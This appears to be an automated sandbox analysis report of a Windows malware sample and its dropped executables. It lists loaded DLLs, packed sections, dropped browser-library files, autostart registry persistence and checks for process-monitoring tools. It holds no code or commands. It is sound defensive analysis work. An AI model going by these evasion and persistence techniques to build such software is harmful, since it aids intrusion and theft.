Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 2949120 > 1048576

Source: file.exe

Static PE information: Raw size of gmhlytvb is bigger than: 0x100000 < 0x2a4a00

Source:	Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Unpacked PE file: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Unpacked PE file: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Unpacked PE file: 8.2.DHMGC7TXSIK31JTC83MV8ND88A.exe.190000.0.unpack :EW;.rsrc:W;.idata :W;rlkngmqk:EW;jjmnbtpn:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 10.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 11.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Unpacked PE file: 12.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 13.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Unpacked PE file: 26.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Unpacked PE file: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: num.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: skotes.exe.4.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: b0b9f39429.exe.7.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: random[1].exe.7.dr	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: real checksum: 0x2b7d41 should be: 0x2bb395
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: e192e43b61.exe.7.dr	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: file.exe	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: num[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: gmhlytvb
Source: file.exe	Static PE information: section name: oycggmgz
Source: file.exe	Static PE information: section name: .taggant
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name:
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: .idata
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: rlkngmqk
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: jjmnbtpn
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: .taggant
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: ujtayirb
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: rmnowbou
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: .taggant
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .rsrc
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .idata
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: rhebxyzr
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: gzayextq
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: ujtayirb
Source: skotes.exe.4.dr	Static PE information: section name: rmnowbou
Source: skotes.exe.4.dr	Static PE information: section name: .taggant
Source: freebl3.dll.6.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr	Static PE information: section name: .didat
Source: nss3.dll.6.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name: gmhlytvb
Source: random[1].exe.7.dr	Static PE information: section name: oycggmgz
Source: random[1].exe.7.dr	Static PE information: section name: .taggant
Source: e192e43b61.exe.7.dr	Static PE information: section name:
Source: e192e43b61.exe.7.dr	Static PE information: section name: .rsrc
Source: e192e43b61.exe.7.dr	Static PE information: section name: .idata
Source: e192e43b61.exe.7.dr	Static PE information: section name: gmhlytvb
Source: e192e43b61.exe.7.dr	Static PE information: section name: oycggmgz
Source: e192e43b61.exe.7.dr	Static PE information: section name: .taggant
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: rhebxyzr
Source: random[1].exe0.7.dr	Static PE information: section name: gzayextq
Source: random[1].exe0.7.dr	Static PE information: section name: .taggant
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .rsrc
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .idata
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name: rhebxyzr
Source: b0b9f39429.exe.7.dr	Static PE information: section name: gzayextq
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .taggant
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: .idata
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: ujtayirb
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: rmnowbou
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: .taggant
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .rsrc
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .idata
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: rhebxyzr
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: gzayextq
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0177A4FA push eax; iretd	0_3_0177A539
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0177A56C pushad ; iretd	0_3_0177A56D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968

Source: file.exe	Static PE information: section name: entropy: 7.982112788144997
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: entropy: 7.811229692376571
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: entropy: 7.983548363166369
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: skotes.exe.4.dr	Static PE information: section name: entropy: 7.983548363166369
Source: skotes.exe.4.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: random[1].exe.7.dr	Static PE information: section name: entropy: 7.982112788144997
Source: e192e43b61.exe.7.dr	Static PE information: section name: entropy: 7.982112788144997
Source: random[1].exe0.7.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: b0b9f39429.exe.7.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: entropy: 7.983548363166369
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File created: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
